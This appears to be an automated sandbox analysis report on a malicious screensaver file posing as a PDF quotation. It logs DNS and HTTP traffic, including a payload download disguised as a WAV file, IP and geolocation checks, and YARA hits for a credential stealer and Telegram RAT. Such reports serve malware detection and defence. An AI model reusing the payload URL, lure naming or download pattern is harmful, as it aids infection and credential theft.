                                                                    Feb 14, 2025 09:21:32.607889891 CET1.1.1.1192.168.2.50xd9bbNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:32.607889891 CET1.1.1.1192.168.2.50xd9bbNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                    Feb 14, 2025 09:21:32.607889891 CET1.1.1.1192.168.2.50xd9bbNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                    • 3007.filemail.com
                                                                    • reallyfreegeoip.org
                                                                    • checkip.dyndns.org
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549704193.30.119.107801852C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                    TimestampBytes transferredDirectionData
                                                                    Feb 14, 2025 09:20:39.197093964 CET188OUTGET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1
                                                                    Host: 3007.filemail.com
                                                                    Connection: Keep-Alive
                                                                    Feb 14, 2025 09:20:39.758234024 CET593INHTTP/1.1 301 Moved Permanently
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Location: https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95
                                                                    Server: Microsoft-IIS/10.0
                                                                    Date: Fri, 14 Feb 2025 08:20:38 GMT
                                                                    Content-Length: 274
                                                                    Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 33 30 30 37 2e 66 69 6c 65 6d 61 69 6c 2e 63 6f 6d 2f 61 70 69 2f 66 69 6c 65 2f 67 65 74 3f 66 69 6c 65 6b 65 79 3d 6e 4e 39 49 36 6d 4d 52 35 71 6d 54 61 63 70 67 78 67 50 5a 70 4f 54 64 59 70 2d 53 57 34 48 54 6d 56 76 4c 32 43 39 35 6e 5f 6d 69 47 4f 77 46 33 49 34 79 52 62 4c 68 4a 79 32 77 26 61 6d 70 3b 70 6b 5f 76 69 64 3d 38 65 32 61 65 63 38 66 30 36 35 64 61 63 39 39 31 37 33 39 34 36 30 34 30 30 63 31 65 62 39 35 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                    Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&amp;pk_vid=8e2aec8f065dac991739460400c1eb95">here</a></body>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549942193.122.6.168801988C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                    TimestampBytes transferredDirectionData
                                                                    Feb 14, 2025 09:21:31.756268978 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Feb 14, 2025 09:21:32.404753923 CET273INHTTP/1.1 200 OK
                                                                    Date: Fri, 14 Feb 2025 08:21:32 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 104
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                    Feb 14, 2025 09:21:32.408797026 CET127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Feb 14, 2025 09:21:32.599126101 CET273INHTTP/1.1 200 OK
                                                                    Date: Fri, 14 Feb 2025 08:21:32 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 104
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549705193.30.119.1074431852C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-02-14 08:20:40 UTC188OUTGET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1
                                                                    Host: 3007.filemail.com
                                                                    Connection: Keep-Alive
                                                                    2025-02-14 08:20:40 UTC320INHTTP/1.1 200 OK
                                                                    Content-Length: 1150984
                                                                    Content-Type: audio/wav
                                                                    Last-Modified: Thu, 13 Feb 2025 15:26:16 GMT
                                                                    Accept-Ranges: bytes
                                                                    ETag: cb2e947d0ea8b694087d4d2991e39ed1
                                                                    X-Transfer-ID: cyflutwufnzcslm
                                                                    Content-Disposition: attachment; filename=Fkwnber.wav
                                                                    Date: Fri, 14 Feb 2025 08:20:40 GMT
                                                                    Connection: close
                                                                    2025-02-14 08:20:40 UTC3323INData Raw: 79 f9 4f 69 ff 97 f3 02 e2 f3 e7 40 13 e9 da 0f 05 2c a8 64 de b6 d7 f0 ed 5d be c0 1b 4e ae d7 8e 15 2c 4f c1 42 f9 43 02 4a f9 b6 41 f0 f7 68 0d 15 3c ef 9e 59 7c f0 49 d4 1a 16 db 82 62 84 71 e2 b7 ca 8b 50 0c 58 28 aa 64 65 c1 0f c6 6c b3 21 09 86 c5 9d 15 69 19 27 88 16 6d 69 3b 92 45 08 52 5d da 79 2e e0 45 00 b8 df 47 cb d2 00 f3 6c 82 b8 9f c8 80 d7 06 8d f7 2f a2 55 37 83 a3 2a 8c 17 ea 04 85 c8 8c 7c d0 40 c1 3f a9 3c 0b b3 56 37 6a 1f 70 ae b6 af 83 76 d6 3b 2b c9 53 ea 74 80 e8 38 f9 54 88 82 21 c5 4a 66 c3 1a 78 64 7a 57 08 2e 26 e2 5a 26 04 05 9d 98 15 a2 f4 7b 33 2e 98 e4 c4 f4 5a b2 89 71 01 96 38 93 9b 81 6e e7 49 80 d9 8f 94 19 c8 9a 26 6a c5 21 4d 1c 19 93 5c 3e 1a d1 05 e7 50 77 0f a7 f1 6c 7e 72 f8 7a 52 0d b5 70 22 3b e5 af 55 58 a5
                                                                    Data Ascii: yOi@,d]N,OBCJAh<Y|IbqPX(del!i'mi;ER]y.EGl/U7*|@?<V7jpv;+St8T!JfxdzW.&Z&{3.Zq8nI&j!M\>Pwl~rzRp";UX
                                                                    2025-02-14 08:20:40 UTC8192INData Raw: 6c 51 9e 8f 7c a6 45 93 70 bf 75 e8 c2 ca 84 fb b3 3b 95 02 da f9 b6 08 6d 77 24 ff 54 a7 04 a2 69 51 61 15 18 56 c1 81 86 87 39 13 9c ff 07 97 8b 92 26 bd 04 27 d2 0c e7 c6 0c 5b 38 2e 72 6a 1c 75 7c c4 4b 4b bf a3 d4 76 cb 38 8b 0f 6c 42 32 9a b0 f5 6b af 40 78 a4 87 58 8d f9 5c 7d 58 5f cd a8 4c 6b b0 fa 69 50 74 a8 ed ae 38 f0 42 50 0c 87 8e 9e 05 58 3c 38 d6 cf aa c6 8c 87 62 03 32 36 73 84 55 4d 31 ba 0b 06 f0 29 2b 99 33 82 f5 04 73 ed 45 04 fe 5e c5 42 b3 09 95 5c 74 13 0a ec 0c e2 65 14 75 d7 3c 96 b9 f5 22 84 18 dc d7 6d d5 88 67 c7 4d c4 43 54 61 71 25 0a 1d 24 e7 8c b7 aa d3 fe 58 9f 73 9b fa db da 18 cb 75 3a f2 de 6a 6f 85 7f ce 3c a7 e8 3e 54 26 a6 0f 75 4b 85 e5 94 62 1d 09 a6 31 43 fd 23 99 30 3a 42 da 2e 36 05 c6 e8 b5 e2 74 00 09 84 98
                                                                    Data Ascii: lQ|Epu;mw$TiQaV9&'[8.rju|KKv8lB2k@xX\}X_LkiPt8BPX<8b26sUM1)+3sE^B\teu<"mgMCTaq%$Xsu:jo<>T&uKb1C#0:B.6t
                                                                    2025-02-14 08:20:40 UTC8192INData Raw: b2 04 6b 32 12 60 b1 9a 46 51 46 29 eb bc b1 09 bf 3a 66 72 01 56 25 d7 38 d0 05 57 cf f9 44 2a 22 02 38 24 b7 df 9b 5a 46 0b 4b a2 fb fa b9 d2 f8 6b 2c 97 69 10 87 0c 02 3a 53 52 90 03 88 81 d9 4f 53 50 d3 9f c8 db 67 5c e2 84 16 ae b0 ff 65 a9 eb 57 81 26 b2 1d 57 cd c9 ad e3 4e 80 e5 03 8d f7 8b a2 84 2a 6c ba 31 ed d9 75 69 08 62 83 b3 dc a4 f0 de b4 64 92 6d a0 0e 2b 76 2e a8 12 8e 58 b5 55 c3 15 12 d9 e1 a0 2e ae 69 1b 0f a1 ad 9a cc 23 4d 16 52 ac 1e 8c d1 d2 a6 81 1a a8 f4 82 4f 80 62 f1 10 2a 25 3c 62 a0 2a 9e 44 d8 bb 71 c5 eb e4 eb c6 88 1a 16 8c d5 ad f1 99 89 ea 5c af 62 ad 44 ba 73 8f a7 40 fe 84 e2 81 4c f9 0f 19 70 4a 8f 76 5b a9 1d 03 52 a8 14 93 55 87 16 ba b7 1a 55 74 59 69 57 40 23 49 db 31 99 a8 5c 91 b8 8a 2b 16 92 a2 21 e4 5f e9 6c
                                                                    Data Ascii: k2`FQF):frV%8WD*"8$ZFKk,i:SROSPg\eW&WN*l1uibdm+v.XU.i#MROb*%<b*Dq\bDs@LpJv[RUUtYiW@#I1\+!_l
                                                                    2025-02-14 08:20:40 UTC8192INData Raw: 18 29 63 7e 6c e4 25 66 e1 55 5c 0b 51 eb 72 24 ac e2 55 63 19 c3 f3 b1 bb 7d 79 96 b2 5e 60 7c e5 b5 3d 29 c9 18 74 37 cf 5b 50 fc 34 12 90 5e 82 aa f9 0d 07 99 e8 23 3a af 88 cd ba 19 77 6e 18 16 52 3d 3e 3d 54 e8 70 ad 44 20 54 81 f3 d0 51 8c d5 ca f7 57 ad a1 02 bf ae da 3e 0d aa ba 79 93 27 47 fa 93 5f a5 50 b9 4f c0 dd 6d 53 00 50 30 0b 8c a1 29 09 46 3c 82 33 97 24 6c 7e 09 54 d7 49 f3 f2 69 8c 98 f2 7c 4b 84 3e 28 23 63 56 76 69 f0 c4 07 e5 25 24 1c 3d dd da c5 c2 b0 e2 eb e1 86 aa f4 08 68 7b e8 1f 0c 9b 89 37 a1 cb af 07 f1 40 ed 99 ac 01 cd c2 4f 7e f1 80 b9 e8 b9 5d e3 fa ff b9 cd a0 a7 83 33 06 60 90 45 e0 d9 d6 dd 32 95 b3 46 14 f3 1a 0c e0 cb 52 02 08 b9 3b 79 21 97 cc a3 aa 6c 62 fc 82 3d 09 7a 4b 00 a8 65 49 ef e2 86 8d cf 1c 7f 3c a6 e6
                                                                    Data Ascii: )c~l%fU\Qr$Uc}y^`|=)t7[P4^#:wnR=>=TpD TQW>y'G_POmSP0)F<3$l~TIi|K>(#cVvi%$=h{7@O~]3`E2FR;y!lb=zKeI<
                                                                    2025-02-14 08:20:40 UTC8192INData Raw: d6 29 dd 77 6f 7e b8 14 90 c2 f2 5d 1f 94 b5 8c b2 af 44 a1 7e b6 9a a0 16 9c 0e 81 86 6f ce 8b 12 48 8c 26 2c 7f 14 13 d3 23 3a 58 3e 88 47 5c 52 04 e2 20 72 eb c7 b8 a2 4e b7 40 65 e6 7d 2b d4 8f 50 eb 18 41 b2 70 9f cb d5 8e 4b f5 8c 28 e9 0c 05 4a 3b 36 8a 0c b5 2d d3 f8 46 f0 e4 03 91 d5 dc ee df f6 43 bb 25 60 2f 35 a5 56 cc cd 96 39 17 fe 69 c3 72 97 35 57 24 e0 15 c1 d1 cd af e0 d9 36 b9 c4 9c 10 0a 7e 17 1a c8 d7 8f 98 30 47 f9 da a8 15 b7 1c 6c 52 af f2 aa 70 4b fa aa 1f 74 b3 ed 4b c0 e9 f9 14 47 c4 a6 4b 28 a9 de a0 7c f9 fe a4 d9 e6 ce 5d 01 55 0c 7d 49 1c 18 10 4b 1a 67 d7 54 2e 45 9b 39 a3 1b c3 50 7d 3e aa 58 66 82 3e 0c 75 ab 22 b6 16 bc 9e 0a f5 d8 0b c8 36 28 0f fa 7f de 27 f6 54 27 a9 18 4f c2 71 2e 80 9c e6 b6 70 bf 19 e1 33 13 9c d7
                                                                    Data Ascii: )wo~]D~oH&,#:X>G\R rN@e}+PApK(J;6-FC%`/5V9ir5W$6~0GlRpKtKGK(|]U}IKgT.E9P}>Xf>u"6('T'Oq.p3
                                                                    2025-02-14 08:20:40 UTC8192INData Raw: d3 be 28 d6 35 85 32 5b 05 71 38 20 16 11 76 70 b9 a3 97 e0 a5 1d 01 e6 fc dc 9f 7d a9 c6 f4 b8 85 e5 dd 80 50 f3 0d 02 8d 43 64 9c 8f 13 a9 73 9b c4 88 df a1 f4 47 4d f0 6f 39 f6 b1 12 fb 6b 61 65 26 a0 8a ae 2e d8 47 2b 82 8d 83 c8 0b 3a 50 04 61 55 38 de a9 57 9d ce 71 5f 61 34 eb 6b cd d4 21 55 2b cf a4 65 93 53 b2 2d 76 0b b4 b1 60 01 0f e2 f0 a5 13 0b 10 c4 f9 58 87 55 a1 70 31 4c c3 da 2e b6 5f ee 2b 32 a8 88 67 d0 cc 5e 1f 2e 18 61 c7 b1 2a d8 8b 05 a9 b6 66 9f 9a f0 28 3c 09 6f 10 83 a4 0d 60 e4 99 48 6d 96 76 7f 51 cd ff 81 00 cd 71 34 9f 4d 80 8e 73 7b 31 cc d7 07 e9 f5 4b 37 bb 8f 75 81 72 d2 28 49 53 9e 6e 3f 2c cd 99 cc 8f f3 54 bc ce cc ed d4 68 82 d6 68 c1 4f 88 b4 68 58 45 8c e2 a0 25 cc 42 a0 95 09 d6 fb ca 6f dc 76 ef ed e3 7b d5 47 6d
                                                                    Data Ascii: (52[q8 vp}PCdsGMo9kae&.G+:PaU8Wq_a4k!U+eS-v`XUp1L._+2g^.a*f(<o`HmvQq4Ms{1K7ur(ISn?,ThhOhXE%Bov{Gm
                                                                    2025-02-14 08:20:40 UTC8192INData Raw: fd 15 4d 98 99 59 c2 5f 49 8c 4b 05 1d 94 39 ee f7 65 01 5a 5e c0 f5 f3 a8 1e 0e 99 14 c2 be 0a 4b 0e e5 0f 2e b6 ac cf 34 3f 87 e2 6c 13 3c 64 3d a5 ad 7d 8f a4 b9 87 c6 a9 38 84 be 82 b7 8c e7 5b bf 76 4b 78 1d c7 44 09 bd dd fc 0c 61 d6 b4 a6 0c e4 db 9a bc 6e 1c d0 f2 eb 6d a8 0e 1b ef fc b6 8f c1 5a 59 88 9c e3 ea e6 e1 34 f7 39 02 68 aa b4 1c 09 77 50 23 3f b5 8e 0d 75 1f b3 d0 4b 61 f2 b2 6b 92 a9 71 d2 e3 21 15 99 45 66 cf a0 ed 1b 4b 2a 7c f2 78 48 ae 6e 3d 9e 36 22 ee 1a 54 d6 b0 12 ae 72 d4 ff 3d dd 46 43 f9 df 8f 4a f7 6f 8d f8 1e 16 74 51 5c d9 be 90 8c 09 8e 9c 70 01 45 bb c1 30 d4 94 2a 82 40 de 74 58 11 9f 72 8f ba 7a 9c 79 aa a4 32 73 45 49 66 37 93 14 6d b5 e7 cf 0b 07 62 31 4c 94 d6 e1 60 96 05 c5 8d 15 29 e0 7f 4b 5b e0 94 02 14 b4 5c
                                                                    Data Ascii: MY_IK9eZ^K.4?l<d=}8[vKxDanmZY49hwP#?uKakq!EfK*|xHn=6"Tr=FCJotQ\pE0*@tXrzy2sEIf7mb1L`)K[\
                                                                    2025-02-14 08:20:41 UTC8192INData Raw: b6 a2 61 0a 82 fd b3 be 76 9d 22 17 d3 00 b5 01 15 26 2c 9e 52 ab 7d 6c 03 3c e2 cd bd 3d 80 95 d9 63 9f 82 d0 09 2d bd dd 7a 6e 19 ef 21 c6 b7 47 02 d9 0e f2 ed 5f 52 d1 e0 35 a2 4b 1a af 3f 16 7d ba 8b 46 8a 6d 51 69 32 6c ae 10 d1 a1 47 d9 e5 c6 9e c6 6e 58 be 21 59 12 71 7d 88 91 90 4d 77 d1 46 23 7f da 50 44 94 db ba 4f 33 5a d8 ba ec 1d 36 fc 19 7a 1a df 19 9a ac 58 f2 49 9c 6d 21 a4 29 88 a0 4b 31 50 17 dd 0e 62 1c 41 c1 18 a5 a2 be df 3a bd 19 14 8f 34 f2 c2 13 fa 27 44 b1 2b c2 01 a5 1f f5 8f c2 73 46 ed 32 ba 30 26 d9 e6 25 42 39 76 04 6a 53 3a 3b 94 8c 62 74 8f a3 8a a8 5f 84 57 12 26 44 63 eb 7f a3 c9 0b ca 12 a5 92 b9 dc d6 30 07 18 00 d4 14 91 8c 3d f0 be 18 a0 ea e5 cd 08 ed 4a 26 e7 70 f4 ae 26 d1 1d fe 77 93 b5 da 63 c0 c5 9c 53 c5 d7 5e
                                                                    Data Ascii: av"&,R}l<=c-zn!G_R5K?}FmQi2lGnX!Yq}MwF#PDO3Z6zXIm!)K1PbA:4'D+sF20&%B9vjS:;bt_W&Dc0=J&p&wcS^
                                                                    2025-02-14 08:20:41 UTC8192INData Raw: 72 5e df c2 1a c1 6e 9e 16 3d 52 06 27 54 c4 22 47 37 4b a4 84 f0 54 db 1b 3d 6e 28 4a b8 64 9b 9e e6 1f 66 ce e1 0f d8 c2 90 18 51 d5 1e 7f 88 f8 2b b2 4a ad 67 61 e3 cf a4 81 48 2c d6 d2 54 57 af 4a c8 f2 97 a2 ed b1 46 dc f6 06 98 22 04 bd 13 e6 d1 d0 37 08 32 e5 01 2b 84 b7 4e 3b e9 d7 47 0d fb 93 ba 94 46 1d 70 2e 25 ed 6b 95 92 e3 c0 88 0d 57 76 40 dc 32 ff df ea 66 47 0d 92 6a a7 f5 77 77 f0 85 41 5c 0b 31 94 f5 aa 35 86 a5 05 aa 0b 42 a5 a0 2c fd 73 0b ea 6c d9 8c 4e 5d 45 b4 39 98 d7 c7 30 d6 ca 1d 05 33 1c fd 56 72 96 0b 51 84 1c 2b 41 38 a4 e6 17 8a ec 21 60 63 80 4e 3f 85 13 42 45 80 97 44 84 66 6b 32 6e ee 16 2b 35 c1 13 8f f2 46 ed d0 0d 08 7c de f1 72 78 ba 31 b0 01 ad e1 b0 71 74 8a 3b 66 ff 1e 06 5a 5d 3c 20 72 42 67 dc b6 6b 5c 90 8b fd
                                                                    Data Ascii: r^n=R'T"G7KT=n(JdfQ+JgaH,TWJF"72+N;GFp.%kWv@2fGjwwA\15B,slN]E903VrQ+A8!`cN?BEDfk2n+5F|rx1qt;fZ]< rBgk\
                                                                    2025-02-14 08:20:41 UTC8192INData Raw: cf 62 d9 71 81 f3 2f 01 92 03 2d de 58 1a 2c b6 63 b3 b5 fb 45 41 61 4d 02 bf f5 f6 13 93 fd 19 de 82 cb 38 2d 4c e4 85 40 21 68 ad ab e2 5d ae 9c e7 90 23 11 7a ec 75 79 bd 7c 71 46 a5 d1 45 c1 fd f1 b3 b4 4d 60 4c 0c 12 d9 0c a6 c4 80 90 8c 7b 53 97 2e 6a 0b 66 a0 33 1d fd 9c 64 0f 43 ec 51 3e 34 90 f3 4f 2e 02 21 ae 0c 0d fb ff e6 d4 f3 03 a4 38 5a 17 39 85 81 01 43 c1 23 04 fb 1c 6a 8a 9a 82 d6 e9 4c 1c c7 25 7b c0 fc 95 0e 34 9a 23 04 5a 81 44 c4 f7 84 42 fb ac 73 60 60 59 38 86 2f 1f 11 c6 38 6f f3 d7 93 99 d6 54 7f 30 e5 23 be 71 c4 58 79 1b dc 53 c5 38 fb b9 9a 6c b5 be c0 e1 59 69 18 08 4a 9e 0d 94 9d 78 80 02 c1 9e d2 de 2b f3 ac b5 81 e9 b3 18 f6 c3 5a 4d b6 85 08 a8 ed 3a 08 ac 03 f4 c9 30 bb 4b 6c 2f fc 1a c0 20 4e de 00 a5 c3 2a 54 a9 47 4a
                                                                    Data Ascii: bq/-X,cEAaM8-L@!h]#zuy|qFEM`L{S.jf3dCQ>4O.!8Z9C#jL%{4#ZDBs``Y8/8oT0#qXyS8lYiJx+ZM:0Kl/ N*TGJ


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549951104.21.112.14431988C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-02-14 08:21:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2025-02-14 08:21:33 UTC859INHTTP/1.1 200 OK
                                                                    Date: Fri, 14 Feb 2025 08:21:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 362
                                                                    Connection: close
                                                                    Age: 4836082
                                                                    Cache-Control: max-age=31536000
                                                                    cf-cache-status: HIT
                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8f7zAB%2FBW3fwCLPinU2X3%2BOyrdPWIcCfZc2CXtYQlqBPsp1Fz0w%2FrLXSIKgW5bs3qZpoY%2FWJ98xSVUN06DXXeJ9zCoGhaguryL4VmGnrPnIwZGiJ8%2F3bqsjPGZ6tKICYJBBNV4uE"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 911ba5327c15c34f-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1513&rtt_var=575&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1891191&cwnd=188&unsent_bytes=0&cid=e3c2393ed730c94e&ts=179&x=0"
                                                                    2025-02-14 08:21:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:03:20:37
                                                                    Start date:14/02/2025
                                                                    Path:C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S
                                                                    Imagebase:0xcf0000
                                                                    File size:340'480 bytes
                                                                    MD5 hash:E63401DADBAE9A4EBD6CE665946EA633
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2587912231.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:03:21:30
                                                                    Start date:14/02/2025
                                                                    Path:C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"
                                                                    Imagebase:0xdd0000
                                                                    File size:340'480 bytes
                                                                    MD5 hash:E63401DADBAE9A4EBD6CE665946EA633
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3287257268.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Reset < >